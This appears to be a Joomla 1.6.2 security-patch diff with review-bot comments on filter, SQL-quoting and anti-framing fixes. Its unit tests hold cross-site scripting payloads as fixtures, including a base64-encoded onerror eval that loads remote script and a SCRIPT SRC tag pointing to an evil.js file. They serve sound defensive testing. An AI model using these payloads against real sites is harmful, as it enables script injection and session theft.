$condition1 = "a.own_prefix=1 AND a.metakey_prefix=SUBSTRING('".$keyword."',1,LENGTH( a.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=1 AND cl.metakey_prefix=SUBSTRING('".$keyword."',1,LENGTH(cl.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=0 AND ".($prefix==substr($keyword,0,strlen($prefix))?'1':'0');
|
$condition1 = "a.own_prefix=1 AND a.metakey_prefix=SUBSTRING(".$db->quote($keyword).",1,LENGTH( a.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=1 AND cl.metakey_prefix=SUBSTRING(".$db->quote($keyword).",1,LENGTH(cl.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=0 AND ".($prefix==substr($keyword,0,strlen($prefix))?'1':'0');
|
||||||
|
|
||||||
$condition2="a.metakey REGEXP '[[:<:]]".$db->getEscaped($keyword) . "[[:>:]]'";
|
$condition2="a.metakey REGEXP '[[:<:]]".$db->getEscaped($keyword) . "[[:>:]]'";
|
||||||
|
|
||||||
|
@ -270,4 +271,4 @@ class BannersModelBanners extends JModelList
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
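Review bot: `$condition2`, directly below the corrected `$condition1`, still places `$db->getEscaped($keyword)` inside a `REGEXP` pattern. `getEscaped()` covers SQL string escaping only, so regular-expression metacharacters in a keyword are read by the database as pattern syntax and can change what matches or make the query fail. Escaping them first, for example `$db->getEscaped(preg_quote($keyword))`, would keep the keyword literal, though the exact escaping should be checked against the database's regex dialect. The added `#__categories as cat` join has no visible use in these hunks; a short comment naming the clause that depends on it would help.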
@ -410,7 +410,7 @@ final class JSite extends JApplication
|
||||||
$menu = $this->getMenu();
|
$menu = $this->getMenu();
|
||||||
$item = $menu->getActive();
|
$item = $menu->getActive();
|
||||||
if (!$item) {
|
if (!$item) {
|
||||||
$item = $menu->getItem(JRequest::getVar('Itemid'));
|
$item = $menu->getItem(JRequest::getInt('Itemid'));
|
||||||
}
|
}
|
||||||
|
|
||||||
$id = 0;
|
$id = 0;
|
||||||
|
|
|
@ -21,7 +21,7 @@ defined('_JEXEC') or die;
|
||||||
// Installation check, and check on removal of the install directory.
|
// Installation check, and check on removal of the install directory.
|
||||||
//
|
//
|
||||||
|
|
||||||
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) /*|| file_exists(JPATH_INSTALLATION.'/index.php')*/) {
|
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) || file_exists(JPATH_INSTALLATION.'/index.php')) {
|
||||||
|
|
||||||
if (file_exists(JPATH_INSTALLATION.'/index.php')) {
|
if (file_exists(JPATH_INSTALLATION.'/index.php')) {
|
||||||
header('Location: '.substr($_SERVER['REQUEST_URI'],0,strpos($_SERVER['REQUEST_URI'],'index.php')).'installation/index.php');
|
header('Location: '.substr($_SERVER['REQUEST_URI'],0,strpos($_SERVER['REQUEST_URI'],'index.php')).'installation/index.php');
|
||||||
|
|
|
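Review bot: With `file_exists(JPATH_INSTALLATION.'/index.php')` active again in the outer condition, the `Location` header on the following lines is reached on any site that still has its installation directory, and its target is built from `$_SERVER['REQUEST_URI']`, which comes from the client's request line. When the URI contains no `index.php`, `strpos()` returns `false` and `substr()` yields an empty prefix, so the header degrades to a relative `installation/index.php`. Deriving the prefix from a server-side value, for example `rtrim(dirname($_SERVER['SCRIPT_NAME']), '/\\').'/installation/index.php'`, would remove the dependency on request data; this should be checked against the supported server setups. The `if` body continues outside this hunk.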
@ -27,6 +27,9 @@ $ -> Language fix or change
|
||||||
- -> Removed
|
- -> Removed
|
||||||
! -> Note
|
! -> Note
|
||||||
|
|
||||||
|
|
||||||
|
-------------------- 1.6.2 Stable Release [14-Apr-2011] ------------------
|
||||||
|
|
||||||
14-Apr-2011
|
14-Apr-2011
|
||||||
# [#25617] performance of assets table query with > 40 articles on website in registered mode
|
# [#25617] performance of assets table query with > 40 articles on website in registered mode
|
||||||
|
|
||||||
|
|
|
@ -279,6 +279,15 @@ class JFilterInput extends JObject
|
||||||
$postTag = substr($postTag, $tagOpen_start);
|
$postTag = substr($postTag, $tagOpen_start);
|
||||||
$fromTagOpen = substr($postTag, 1);
|
$fromTagOpen = substr($postTag, 1);
|
||||||
$tagOpen_end = strpos($fromTagOpen, '>');
|
$tagOpen_end = strpos($fromTagOpen, '>');
|
||||||
|
|
||||||
|
// Check for mal-formed tag where we have a second '<' before the first '>'
|
||||||
|
$nextOpenTag = (strlen($postTag) > $tagOpen_start) ? strpos($postTag, '<', $tagOpen_start + 1) : false;
|
||||||
|
if (($nextOpenTag !== false) && ($nextOpenTag < $tagOpen_end)) {
|
||||||
|
// At this point we have a mal-formed tag -- remove the offending open
|
||||||
|
$postTag = substr($postTag, 0, $tagOpen_start) . substr($postTag, $tagOpen_start + 1);
|
||||||
|
$tagOpen_start = strpos($postTag, '<');
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
|
||||||
// Let's catch any non-terminated tags and skip over them
|
// Let's catch any non-terminated tags and skip over them
|
||||||
if ($tagOpen_end === false) {
|
if ($tagOpen_end === false) {
|
||||||
|
@ -566,13 +575,19 @@ class JFilterInput extends JObject
|
||||||
$escapedChars = array ('<', '"', '>');
|
$escapedChars = array ('<', '"', '>');
|
||||||
// Process each portion based on presence of =" and "<space>, "/>, or ">
|
// Process each portion based on presence of =" and "<space>, "/>, or ">
|
||||||
// See if there are any more attributes to process
|
// See if there are any more attributes to process
|
||||||
while (preg_match('#\s*=\s*\"#', $remainder, $matches, PREG_OFFSET_CAPTURE))
|
while (preg_match('#\s*=\s*(\"|\')#', $remainder, $matches, PREG_OFFSET_CAPTURE))
|
||||||
{
|
{
|
||||||
// get the portion before the attribute value
|
// get the portion before the attribute value
|
||||||
$quotePosition = $matches[0][1];
|
$quotePosition = $matches[0][1];
|
||||||
$nextBefore = $quotePosition + strlen($matches[0][0]);
|
$nextBefore = $quotePosition + strlen($matches[0][0]);
|
||||||
|
|
||||||
|
// Figure out if we have a single or double quote and look for the matching closing quote
|
||||||
|
// Closing quote should be "/>, ">, "<space>, or " at the end of the string
|
||||||
|
$quote = substr($matches[0][0], -1);
|
||||||
|
$pregMatch = ($quote == '"') ? '#(\"\s*/\s*>|\"\s*>|\"\s+|\"$)#' : "#(\'\s*/\s*>|\'\s*>|\'\s+|\'$)#";
|
||||||
|
|
||||||
// get the portion after attribute value
|
// get the portion after attribute value
|
||||||
if (preg_match('#(\"\s*/\s*>|\"\s*>|\"\s+|\"$)#', substr($remainder, $nextBefore), $matches, PREG_OFFSET_CAPTURE)) {
|
if (preg_match($pregMatch, substr($remainder, $nextBefore), $matches, PREG_OFFSET_CAPTURE)) {
|
||||||
// We have a closing quote
|
// We have a closing quote
|
||||||
$nextAfter = $nextBefore + $matches[0][1];
|
$nextAfter = $nextBefore + $matches[0][1];
|
||||||
} else {
|
} else {
|
||||||
|
@ -583,11 +598,40 @@ class JFilterInput extends JObject
|
||||||
$attributeValue = substr($remainder, $nextBefore, $nextAfter - $nextBefore);
|
$attributeValue = substr($remainder, $nextBefore, $nextAfter - $nextBefore);
|
||||||
// Escape bad chars
|
// Escape bad chars
|
||||||
$attributeValue = str_replace($badChars, $escapedChars, $attributeValue);
|
$attributeValue = str_replace($badChars, $escapedChars, $attributeValue);
|
||||||
$alreadyFiltered .= substr($remainder, 0, $nextBefore) . $attributeValue . '"';
|
$attributeValue = $this->_stripCSSExpressions($attributeValue);
|
||||||
|
$alreadyFiltered .= substr($remainder, 0, $nextBefore) . $attributeValue . $quote;
|
||||||
$remainder = substr($remainder, $nextAfter + 1);
|
$remainder = substr($remainder, $nextAfter + 1);
|
||||||
}
|
}
|
||||||
|
|
||||||
// At this point, we just have to return the $alreadyFiltered and the $remainder
|
// At this point, we just have to return the $alreadyFiltered and the $remainder
|
||||||
return $alreadyFiltered . $remainder;
|
return $alreadyFiltered . $remainder;
|
||||||
}
|
}
|
||||||
|
/**
|
||||||
|
* Remove CSS Expressions in the form of <property>:expression(...)
|
||||||
|
*
|
||||||
|
* @param string $source The source string.
|
||||||
|
* @return string Filtered string
|
||||||
|
* @since 1.6
|
||||||
|
*/
|
||||||
|
protected function _stripCSSExpressions($source)
|
||||||
|
{
|
||||||
|
// Strip any comments out (in the form of /*...*/)
|
||||||
|
$test = preg_replace('#\/\*.*\*\/#U', '', $source);
|
||||||
|
// Test for :expression
|
||||||
|
if (!stripos($test, ':expression')) {
|
||||||
|
// Not found, so we are done
|
||||||
|
$return = $source;
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// At this point, we have stripped out the comments and have found :expression
|
||||||
|
// Test stripped string for :expression followed by a '('
|
||||||
|
if (preg_match_all('#:expression\s*\(#', $test, $matches)) {
|
||||||
|
// If found, remove :expression
|
||||||
|
$test = str_ireplace(':expression', '', $test);
|
||||||
|
$return = $test;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return $return;
|
||||||
|
}
|
||||||
|
|
||||||
}
|
}
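Review bot: `_stripCSSExpressions()` can reach `return $return;` with `$return` never assigned. When `stripos()` finds `:expression` but the case-sensitive `preg_match_all('#:expression\s*\(#', ...)` does not match (different letter case, or no `(` after it), neither branch sets it, so the method returns null with a notice and the attribute value is silently emptied. `if (!stripos($test, ':expression'))` also treats a match at offset 0 as "not found", because `stripos()` returns 0 there, and the value is then returned unfiltered. I would compare against `false`, add the `i` modifier so the pattern agrees with `stripos()` and `str_ireplace()`, and return `$source` on every path that strips nothing. The whole method is inside this hunk.

```php
protected function _stripCSSExpressions($source)
{
	// Strip any comments out (in the form of /*...*/)
	$test = preg_replace('#\/\*.*\*\/#U', '', $source);
	// stripos() returns 0 for a match at offset 0, so compare against false
	if (stripos($test, ':expression') === false) {
		return $source;
	}
	// Match case-insensitively, consistent with stripos()/str_ireplace()
	if (preg_match('#:expression\s*\(#i', $test)) {
		return str_ireplace(':expression', '', $test);
	}
	// ':expression' is present but not followed by '(' -- nothing to strip
	return $source;
}
```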
|
||||||
|
|
|
@ -660,10 +660,13 @@ abstract class JHtmlBehavior
|
||||||
// Include mootools framework
|
// Include mootools framework
|
||||||
self::framework();
|
self::framework();
|
||||||
|
|
||||||
$js = "window.addEvent('domready', function () {if (top != self) {top.location.replace(".$location.");}});";
|
$js = "window.addEvent('domready', function () {if (top == self) {document.documentElement.style.display = 'block'; } else {top.location = self.location; }});";
|
||||||
$document = JFactory::getDocument();
|
$document = JFactory::getDocument();
|
||||||
|
$document->addStyleDeclaration('html { display:none }');
|
||||||
$document->addScriptDeclaration($js);
|
$document->addScriptDeclaration($js);
|
||||||
|
|
||||||
|
JResponse::setHeader('X-Frames-Options', 'SAME-ORIGIN');
|
||||||
|
JResponse::setHeader('X-Content-Security-Policy', 'frame-ancestors \'self\'');
|
||||||
$loaded = true;
|
$loaded = true;
|
||||||
}
|
}
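Review bot: The header set by `JResponse::setHeader('X-Frames-Options', 'SAME-ORIGIN');` is misspelled in both name and value, so browsers will ignore it. The header is `X-Frame-Options` and the token is `SAMEORIGIN`, so the line should read `JResponse::setHeader('X-Frame-Options', 'SAMEORIGIN');`. Until that is fixed, the framing defence appears to rest on the script plus the `html { display:none }` rule, which also leaves the page hidden when JavaScript is disabled. The enclosing function starts outside the hunk, so whether `$location` is still used after the rewritten `$js` line cannot be confirmed from here.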
|
||||||
|
|
||||||
|
|
|
@ -24,13 +24,13 @@ class JVersion
|
||||||
/** @public string Development Status */
|
/** @public string Development Status */
|
||||||
public $DEV_STATUS = 'Stable';
|
public $DEV_STATUS = 'Stable';
|
||||||
/** @public int Sub Release Level */
|
/** @public int Sub Release Level */
|
||||||
public $DEV_LEVEL = '1';
|
public $DEV_LEVEL = '2';
|
||||||
/** @public int build Number */
|
/** @public int build Number */
|
||||||
public $BUILD = '';
|
public $BUILD = '';
|
||||||
/** @public string Codename */
|
/** @public string Codename */
|
||||||
public $CODENAME = 'Onward';
|
public $CODENAME = 'Onward';
|
||||||
/** @public string Date */
|
/** @public string Date */
|
||||||
public $RELDATE = '07-Mar-2011';
|
public $RELDATE = '14-Apr-2011';
|
||||||
/** @public string Time */
|
/** @public string Time */
|
||||||
public $RELTIME = '23:00';
|
public $RELTIME = '23:00';
|
||||||
/** @public string Timezone */
|
/** @public string Timezone */
|
||||||
|
|
|
@ -3,6 +3,8 @@
|
||||||
* PHPMailer language file.
|
* PHPMailer language file.
|
||||||
* English Version
|
* English Version
|
||||||
*/
|
*/
|
||||||
|
// no direct access
|
||||||
|
defined('_JEXEC') or die;
|
||||||
|
|
||||||
$PHPMAILER_LANG = array();
|
$PHPMAILER_LANG = array();
|
||||||
|
|
||||||
|
|
|
@ -311,6 +311,30 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'123.567',
|
'123.567',
|
||||||
'From generic cases'
|
'From generic cases'
|
||||||
),
|
),
|
||||||
|
'string_single_quote' => array(
|
||||||
|
'string',
|
||||||
|
"this is a 'test' of ?",
|
||||||
|
"this is a 'test' of ?",
|
||||||
|
'From generic cases'
|
||||||
|
),
|
||||||
|
'string_double_quote' => array(
|
||||||
|
'string',
|
||||||
|
'this is a "test" of "double" quotes',
|
||||||
|
'this is a "test" of "double" quotes',
|
||||||
|
'From generic cases'
|
||||||
|
),
|
||||||
|
'string_odd_double_quote' => array(
|
||||||
|
'string',
|
||||||
|
'this is a "test of "odd number" of quotes',
|
||||||
|
'this is a "test of "odd number" of quotes',
|
||||||
|
'From generic cases'
|
||||||
|
),
|
||||||
|
'string_odd_mixed_quote' => array(
|
||||||
|
'string',
|
||||||
|
'this is a "test\' of "odd number" of quotes',
|
||||||
|
'this is a "test\' of "odd number" of quotes',
|
||||||
|
'From generic cases'
|
||||||
|
),
|
||||||
'unknown_01' => array(
|
'unknown_01' => array(
|
||||||
'',
|
'',
|
||||||
'123.567',
|
'123.567',
|
||||||
|
@ -356,7 +380,7 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'Malformed Nested tags' => array(
|
'Malformed Nested tags' => array(
|
||||||
'',
|
'',
|
||||||
'<em><strongFred</strong></em>',
|
'<em><strongFred</strong></em>',
|
||||||
'<em><strongFred</strong></em>',
|
'<em>strongFred</strong></em>',
|
||||||
'From generic cases'
|
'From generic cases'
|
||||||
),
|
),
|
||||||
'Unquoted Attribute Without Space' => array(
|
'Unquoted Attribute Without Space' => array(
|
||||||
|
@ -413,6 +437,12 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'<img class="one two" />',
|
'<img class="one two" />',
|
||||||
'Test for recursion with single tags - From generic cases'
|
'Test for recursion with single tags - From generic cases'
|
||||||
),
|
),
|
||||||
|
'missing_quote' => array(
|
||||||
|
'string',
|
||||||
|
'<img height="123 />',
|
||||||
|
'img height="123 />"',
|
||||||
|
'From generic cases'
|
||||||
|
),
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -662,7 +692,37 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'<img class="one two" />',
|
'<img class="one two" />',
|
||||||
'<img />',
|
'<img />',
|
||||||
'From specific cases'
|
'From specific cases'
|
||||||
)
|
),
|
||||||
|
'security_20110329a' => array(
|
||||||
|
'string',
|
||||||
|
"<img src='<img src='///'/> ",
|
||||||
|
'<img /> ',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'security_20110329b' => array(
|
||||||
|
'string',
|
||||||
|
"<img src='<img src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
|
||||||
|
'<img /> ',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'hanging_quote' => array(
|
||||||
|
'string',
|
||||||
|
"<img src=\' />",
|
||||||
|
'<img />',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'hanging_quote2' => array(
|
||||||
|
'string',
|
||||||
|
'<img src slkdjls " this is "more " stuff',
|
||||||
|
'img src slkdjls " this is "more " stuff',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'hanging_quote3' => array(
|
||||||
|
'string',
|
||||||
|
"<img src=\"\'\" />",
|
||||||
|
'<img />',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
);
|
);
|
||||||
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
||||||
|
|
||||||
|
@ -954,7 +1014,7 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'security_tracker_24802_e' => array(
|
'security_tracker_24802_e' => array(
|
||||||
'',
|
'',
|
||||||
'<img src=<img src=x"/onerror=alert(1)//">',
|
'<img src=<img src=x"/onerror=alert(1)//">',
|
||||||
'<img src=<img src="x/onerror=alert(1)//" />',
|
'img src=<img src="x/onerror=alert(1)//" />',
|
||||||
'From specific cases'
|
'From specific cases'
|
||||||
),
|
),
|
||||||
'empty_alt' => array(
|
'empty_alt' => array(
|
||||||
|
@ -1023,6 +1083,60 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'<p class="my_class">This is a <a href="http://mysite.com" img="my_image">link test</a>. This is <span class="myclass" font="myfont"> some more</span> text.</p>',
|
'<p class="my_class">This is a <a href="http://mysite.com" img="my_image">link test</a>. This is <span class="myclass" font="myfont"> some more</span> text.</p>',
|
||||||
'Test valid nested tag'
|
'Test valid nested tag'
|
||||||
),
|
),
|
||||||
|
'hanging_quote' => array(
|
||||||
|
'string',
|
||||||
|
"<img src=\' />",
|
||||||
|
'<img src="" />',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'hanging_quote2' => array(
|
||||||
|
'string',
|
||||||
|
'<img src slkdjls " this is "more " stuff',
|
||||||
|
'img src slkdjls " this is "more " stuff',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'hanging_quote3' => array(
|
||||||
|
'string',
|
||||||
|
"<img src=\"\' />",
|
||||||
|
'img src="\\\' />"',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'tracker25558a' => array(
|
||||||
|
'string',
|
||||||
|
'<SCRIPT SRC=http://jeffchannell.com/evil.js#<B />',
|
||||||
|
'SCRIPT SRC=http://jeffchannell.com/evil.js#<B />',
|
||||||
|
'Test mal-formed element from 25558a'
|
||||||
|
),
|
||||||
|
'tracker25558b' => array(
|
||||||
|
'string',
|
||||||
|
'<IMG STYLE="xss:expression(alert(\'XSS\'))" />',
|
||||||
|
'<IMG STYLE="xss(alert(\'XSS\'))" />',
|
||||||
|
'Test mal-formed element from 25558b'
|
||||||
|
),
|
||||||
|
'tracker25558c' => array(
|
||||||
|
'string',
|
||||||
|
'<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))" />',
|
||||||
|
'<IMG STYLE="xss(alert(\'XSS\'))" />',
|
||||||
|
'Test mal-formed element from 25558b'
|
||||||
|
),
|
||||||
|
'tracker25558d' => array(
|
||||||
|
'string',
|
||||||
|
'<IMG STYLE="xss:expr/*XSS*/ess/*another comment*/ion(alert(\'XSS\'))" />',
|
||||||
|
'<IMG STYLE="xss(alert(\'XSS\'))" />',
|
||||||
|
'Test mal-formed element from 25558b'
|
||||||
|
),
|
||||||
|
'tracker25558e' => array(
|
||||||
|
'string',
|
||||||
|
'<b><script<b></b><alert(1)</script </b>',
|
||||||
|
'<b>script<b></b>alert(1)/script</b>',
|
||||||
|
'Test mal-formed element from 25558e'
|
||||||
|
),
|
||||||
|
'security_20110329a' => array(
|
||||||
|
'string',
|
||||||
|
"<img src='<img src='///'/> ",
|
||||||
|
"<img src=\"'<img\" src=\"'///'/\" /> ",
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
);
|
);
|
||||||
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
||||||
|
|
||||||
|
@ -1112,7 +1226,14 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'<img class="one two" />',
|
'<img class="one two" />',
|
||||||
'',
|
'',
|
||||||
'From specific cases'
|
'From specific cases'
|
||||||
)
|
),
|
||||||
|
'security_20110328' => array(
|
||||||
|
'string',
|
||||||
|
"<img src='<img
|
||||||
|
src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
|
||||||
|
' ',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
);
|
);
|
||||||
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
$tests = array_merge($this->casesGeneric(), $casesSpecific);
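Review bot: The failure messages for `tracker25558c` and `tracker25558d` both read `'Test mal-formed element from 25558b'`, copied from the `tracker25558b` case, so a failing assertion would name the wrong case. They should read `'Test mal-formed element from 25558c'` and `'Test mal-formed element from 25558d'`. The new `STYLE` cases also all use lower-case `expression` followed by `(`. One case with different letter case and one with `:expression` not followed by a parenthesis would pin down what the filter returns on those paths.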
|
||||||
|
|
||||||
|
|